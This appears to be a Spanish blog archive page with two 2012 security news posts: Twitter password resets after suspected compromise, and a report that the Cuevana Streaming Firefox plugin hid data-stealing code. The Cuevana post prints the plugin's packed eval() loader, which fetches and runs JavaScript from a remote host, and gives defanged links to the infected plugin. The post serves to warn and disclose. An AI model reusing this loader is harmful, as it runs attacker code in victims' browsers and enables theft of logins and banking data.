Archivo

Posts Tagged ‘phissing’

Twitter experimenta intentos de robo de contraseña

noviembre 10, 2012 Deja un comentario

Es posible que hayas recibido un email de Twitter en el que se te informa de que tu cuenta se ha visto comprometida por un servicio ajeno a la compañía. El servicio de ‘microblogging’ parece haber sufrido algún tipo de intrusión masiva y la advertencia se está produciendo por todo el mundo.

En Portaltic, sin ir más lejos, hemos experimentado esta incidencia. El problema se manifiesta de dos formas. En primer lugar, el usuario se ve incapaz de acceder a su cuenta, debido a la intrusión o el intento de intrusión, lo que ha obligado a Twitter a tomar medidas preventivas. De esta forma, la compañía advierte en un mail: “Hemos borrado tu contraseña para prevenir que otros puedan acceder a tu cuenta”.

Leer más…

Anuncios

¿El plug-in de Cuevana roba información financiera?

septiembre 17, 2012 Deja un comentario
Actualización: es probable que el script del plugin haya sido modificado por un tercero, ajeno a Cuevana. Lee el post hasta el final.

Cuevana, la conocida web de visionado online usada por varios millones de personas ha sido reportada como una web de “phising” (robo de datos sensibles) al detectar que el plugin que utiliza para supuestamente hacer streaming de los contenidos, contiene código malicioso utilizado para robar tus datos de redes sociales como Facebook e incluso de sitios de banca online como Banco Santander, Paypal y otros servicios de pago generalmente latinoamericanos.

Al parecer, al intentar visionar contenido de su sitio, este pide autorización para instalar un complemento (plugin) para tu navegador (tanto Firefox como Chrome). Este complemento aparentemente inofensivo resulta tener escondido en su código un script que contacta con el sitio web hxxp://cuevanatv.asia que contiene codigos en JavaScript para efectuar el robo de tus datos personales cada vez que rellenas un formulario en un sitio de confianza.

Se recomienda encarecidamente a todas las personas que alguna vez hayan visitado este conocido portal de streaming que revisen sus navegadores y eliminen el plugin “Cuevana Streaming”. Después de este procedimiento es obligatorio cambiar todas tus claves que hayan podido ser interceptadas por este script malicioso.

Si deseas investigar el plugin, solo necesitas descargarlo desde hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi y extraerlo con un descompresor de archivos (WinRar, 7Zip, etc.), despues abre el archivo “script-compiler.js” que encontrarás en la carpeta “content”. Una vez abierto ese archivo observa la linea número 232.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 0=7 5();0.4(\'1\',\'2://3.8/h.9?\'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.split('|'),0,{}))

Actualización 19:00: confirmado, en Firefox, cualquier versión, está infectado con el código malicioso que roba datos. También estamos descubriendo scripts que parecen relacionados con el phising y robo de datos bancarios.

Actualización 19.30: descomprimir el XPI con WinRar (hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi) (NO LO INSTALE).

Entrar en la carpeta “content” y mirar la linea 232 del archivo “script-compiler.js”. La url maliciosa es hxxp://cuevanatv.asia/back3.js.

Actualización 19.50:  han cambiado al código fuente del plugin. El plugin original para analizarlo se encuentra aquí.

Actualización 19.57: el nuevo plugin (diferente pero con la misma versión para que no se sospeche ) ya no roba datos. En el Tamper Data ya no da el aviso que daba antes. Han borrado la línea maliciosa del código para ocultar las pruebas. En el hilo de Foro Coches se puede encontrar el fichero original con el código malicioso, como prueba. Esto quiere decir que han borrado u ocultado la parte del código maliciosa.

Actualización 21:00: he analizado el código fuente de la versión 4.2 instalado en mi propia computadora hace tiempo (más de un mes) y la misma versión 4.2 modificada y efectivamente se observa la diferencia en el código fuente. A continuación dejo los dos fuentes:

Versión instalada hace un mes
Versión modificada

En Windows Vista o superior, el plugin lo puedes encontrar en: C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\\

La diferencia en el código podría indicar que:

El tiempo dirá.

Actualización 21:50: Cuevana está investigando el tema y recomienda desinstalar el plugin, e instalarlo nuevamente. Además se deben cambiar todas las contraseñas.

Fuente: Foro Coches y Galacticow Segu-Info

 

Categorías:Malware, Noticias Etiquetas: , ,